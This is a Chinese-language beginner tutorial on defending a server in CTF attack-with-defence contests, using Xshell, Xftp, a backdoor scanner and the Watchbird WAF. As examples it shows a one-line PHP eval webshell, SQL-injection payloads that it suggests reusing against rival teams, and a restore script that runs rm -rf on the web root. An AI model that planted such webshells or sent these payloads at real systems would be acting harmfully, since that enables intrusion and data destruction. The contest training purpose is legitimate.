从零开始玩转CTF AWDXshellXftp与Watchbird WAF实战指南第一次参加CTF AWD比赛时面对陌生的服务器和紧张的时间压力很多新手选手会感到手足无措。本文将带你一步步搭建起基础防御体系即使零基础也能快速上手。我们不会涉及复杂的代码审计或高级攻击技巧而是专注于那些能让你活下来的必备技能——毕竟在AWD比赛中不被淘汰就是最好的进攻。1. 基础工具准备与环境搭建1.1 必备工具清单在开始前你需要准备以下工具所有工具均有免费版本可用Xshell专业的SSH客户端提供稳定的终端连接Xftp与Xshell配套的文件传输工具支持图形化操作Watchbird WAF轻量级PHP Web应用防火墙D盾Webshell查杀工具Seay源代码审计系统PHP代码审计工具提示建议提前下载好这些工具并熟悉基本界面比赛时网络环境可能不稳定1.2 初始服务器连接拿到比赛提供的SSH凭证后通常包括IP、端口、用户名和密码按以下步骤连接打开Xshell点击新建会话在连接对话框中填写名称任意标识如MyAWD协议SSH主机比赛提供的IP端口通常为22确认比赛说明点击用户身份验证输入用户名和密码点击连接建立会话常见连接问题排查错误类型可能原因解决方案连接超时网络问题/IP错误检查网络确认IP和端口认证失败密码错误重新核对比赛提供的凭证拒绝连接服务器未启动联系比赛管理员连接成功后你应该能看到类似这样的提示符[awd-userhost ~]$2. 网站源码获取与初步分析2.1 使用Xftp下载网站文件在Xshell中成功连接后点击工具栏上的Xftp按钮会自动启动Xftp并连接到同一服务器。默认网站根目录通常是Apache/var/www/html/Nginx/usr/share/nginx/html/右键点击html文件夹选择传输将其下载到本地。这个过程可能需要几分钟取决于网站大小。2.2 快速后门检测下载完成后立即使用D盾进行扫描打开D盾点击扫描目录选择下载的html文件夹等待扫描完成典型的后门特征包括可疑的eval(、assert(函数调用非常规的文件名如a.php、test.php编码过的代码片段可疑的上传功能发现后门后在Xftp中定位到相应文件右键选择编辑进行修改。最简单的处理方式是直接删除可疑代码段或者用无害代码替换// 原后门代码 ?php eval($_POST[cmd]); ? // 替换为 ?php echo This is a safe page; ?3. Watchbird WAF部署与配置3.1 WAF安装步骤将Watchbird WAF压缩包通过Xftp上传到网站根目录在Xshell中执行安装命令php watchbird.php --install /var/www/html安装完成后访问任意PHP页面加上参数http://your-ip/anypage.php?watchbirdui3.2 基础配置指南首次访问会进入配置页面建议设置管理员密码使用强密码比赛环境下可简单些防护模式新手建议选择学习模式日志级别设置为详细拦截通知开启邮件通知如果比赛环境支持关键配置项说明配置项推荐设置作用SQL注入防护开启拦截常见SQL注入尝试XSS防护开启阻止跨站脚本攻击目录遍历开启防止../等路径遍历文件包含开启拦截远程/本地文件包含3.3 日志分析与利用Watchbird的日志功能是新手最好的学习工具。在UI界面点击日志选项卡你可以看到攻击时间攻击类型攻击payload来源IP典型的攻击日志示例[2023-07-20 14:30:45] SQLi detected from 192.168.1.100 Payload: OR 11 --当你不确定如何攻击其他队伍时这些日志就是现成的攻击思路。看到别人尝试的payload你可以用同样的方法测试其他队伍。4. 防御加固与自动化策略4.1 基础安全加固除了部署WAF外还应进行以下基础防护修改默认密码passwd关闭不必要的服务systemctl stop vsftpd # 示例关闭FTP服务限制文件权限chmod -R 755 /var/www/html find /var/www/html -type f -exec chmod 644 {} \;4.2 简易监控脚本创建一个简单的监控脚本检测网站文件变化#!/bin/bash while true; do find /var/www/html -type f -exec md5sum {} \; /tmp/current.md5 if ! diff /tmp/current.md5 /tmp/base.md5; then echo 文件被修改 | mail -s 警报 youremail.com fi sleep 30 done首次运行前生成基准MD5find /var/www/html -type f -exec md5sum {} \; /tmp/base.md54.3 备份与恢复策略比赛中断网或文件被篡改时快速恢复至关重要定期备份关键文件tar -czvf /tmp/backup_$(date %Y%m%d).tar.gz /var/www/html准备一键恢复脚本restore.sh#!/bin/bash rm -rf /var/www/html/* tar -xzvf /tmp/backup_latest.tar.gz -C /5. 从防御转向进攻5.1 基于WAF日志的攻击分析Watchbird拦截的攻击提取有效payload。例如如果看到有人尝试/index.php?id1 AND 11你可以用同样的方法测试其他队伍http://其他队伍IP/index.php?id1 AND 115.2 自动化flag提交准备一个简单的Python脚本自动提交flagimport requests flags [flag1{...}, flag2{...}] # 替换为实际flag url http://比赛提交地址/submit for flag in flags: data {token: 你的token, flag: flag} r requests.post(url, datadata) print(f提交 {flag}: {r.text})5.3 保持简单有效新手常犯的错误是追求复杂攻击手段而忽略基础。实际上AWD比赛中80%的得分来自基础漏洞利用15%来自自动化脚本只有5%需要高级技巧记住稳定拿到基础分远比尝试高级攻击却导致自己服务宕机更明智。